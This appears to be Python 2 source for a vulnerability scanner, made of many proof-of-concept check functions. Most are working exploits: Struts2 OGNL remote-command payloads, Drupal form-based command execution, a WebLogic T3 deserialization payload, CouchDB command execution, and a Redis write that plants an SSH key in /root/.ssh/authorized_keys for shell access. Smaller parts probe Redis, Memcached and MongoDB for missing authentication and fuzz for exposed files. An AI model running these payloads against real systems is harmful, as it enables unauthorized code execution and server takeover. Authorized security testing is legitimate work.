def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(3)
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
port = int(ip.split(':')[-1]) if ':' in ip else 6379
ip = DelPort(ip)
s = socket.socket()
s.connect((ip, port))
s.send(payload)
recvdata = s.recv(1024)
s.close()
if recvdata and 'redis_version' in recvdata:
result['success'] = True
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(5)
random_str = RandomString()
url = AddScheme(url)
payload = {
'name':
'''%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=#parameters.cmd[0]).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''',
'age': '1',
'__checkbox_bustedBefore': 'true',
'description': '1',
'cmd': 'echo ' + random_str
}
r = requests.post(url +
'/struts2-showcase/integration/saveGangster.action',
data=payload,
timeout=5)
if random_str in r.text and 'html' not in r.text:
result[
'message'] = url + '/struts2-showcase/integration/saveGangster.action'
result['success'] = True
r = requests.post(url + '/integration/saveGangster.action',
data=payload,
timeout=5)
if random_str in r.text and 'html' not in r.text:
result['message'] = url + '/integration/saveGangster.action'
result['success'] = True
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(3)
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
port = int(ip.split(':')[-1]) if ':' in ip else 11211
ip = DelPort(ip)
payload = '\x73\x74\x61\x74\x73\x0a'
s = socket.socket()
s.connect((ip, port))
s.send(payload)
recvdata = s.recv(2048)
s.close()
if recvdata and 'STAT version' in recvdata:
result['success'] = True
result['message'] = 'version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
socket.setdefaulttimeout(5)
result = {}
result['success'] = False
result['message'] = ''
try:
random_str = RandomString()
url = GetNetloc(url, True)
target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]':
'echo ' + random_str + ' | tee ' + random_str + '.txt'
}
r = requests.post(target, data=payload, timeout=5)
if r.status_code != 200:
return result
else:
r = requests.get(url + '/' + random_str + '.txt', timeout=5)
if r.status_code == 200 and random_str == r.text.strip():
result['success'] = True
result['message'] = 'random_file: /' + random_str + '.txt'
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
socket.setdefaulttimeout(15)
if ':' in GetNetloc(url):
dport = int(GetNetloc(url).split(':')[1])
else:
dport = 7001
ip = DomainToIP(GetNetloc(url))
if ip == None:
return result
if ':' in ip:
dip = ip.split(':')[0]
else:
dip = ip
try:
index = 0
PAYLOAD = ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
if checkVul(rs,index):
result['success'] = True
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
if ':' in GetNetloc(url):
port = GetNetloc(url).split(':')[1]
else:
port = '5984'
ip = DomainToIP(GetNetloc(url))
if ip == None:
return result
if ':' in ip:
ip = ip.split(':')[0]
url = GetNetloc(ip + ':' + port, True)
version = GetVersion(url)
AddUser(url)
rangom_string = RandomString()
command = '"ping -n 2 %s"' % (rangom_string + '.' + conf.CEYE_DOMAIN)
CmeExec(url, command, version)
data = CheckDnsLog(rangom_string)
if data != False:
result['success'] = True
result['message'] = 'remote_addr:' + data[0][
'remote_addr'] + ' name: ' + data[0]['name']
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(5)
random_str = RandomString()
url = AddScheme(url)
targets = FuzzAction(url)
payload = '''?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=echo ''' + random_str
for target in targets:
r = requests.post(target + payload, data=payload, timeout=5)
if random_str in r.text and 'html' not in r.text:
result['success'] = True
return result
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
port = int(ip.split(':')[-1]) if ':' in ip else 27017
ip = DelPort(ip)
MONGO_URI = 'mongodb://'+ip+':'+str(port)+'/'
conn = pymongo.MongoClient(MONGO_URI, serverSelectionTimeoutMS=3000)
dbs = conn.database_names()
result['success'] = True
result['message'] = str(dbs)
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
result = {}
try:
data = ''
url = GetNetloc(url, True)
if CheckTargetAccess(url):
files = LoadDict(dict_path)
for file in files:
try:
file = file.strip()
res = requests.get(url[0:-1] + file, timeout=3)
except:
continue
if str(res.status_code).startswith('2'):
data = data + '\n' + file + ': ' + str(res.status_code)
if data:
result['weak_file'] = data
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
public_key = '1'
if public_key == '':
raise PocErrorException(
'Poc:redis_sshkey_getshell Public_key is none! please input public_key.'
)
result = {}
result['success'] = False
result['message'] = ''
try:
url = GetNetloc(url)
url = DomainToIP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
if not CheckPort(ip, 22):
return result
r = redis.Redis(host=ip,
port=port,
db=0,
socket_timeout=2,
socket_connect_timeout=2)
if 'redis_version' in r.info():
key = RandomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key)
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
result['success'] = True
return result
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(5)
random_str = RandomString()
payload = {
"User-Agent":
GetUserAgent(),
"Content-Type":
"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\"echo "
+ random_str +
"\").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
r = requests.get(url, headers=payload, timeout=5)
if random_str in r.text and 'html' not in r.text:
result['success'] = True
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))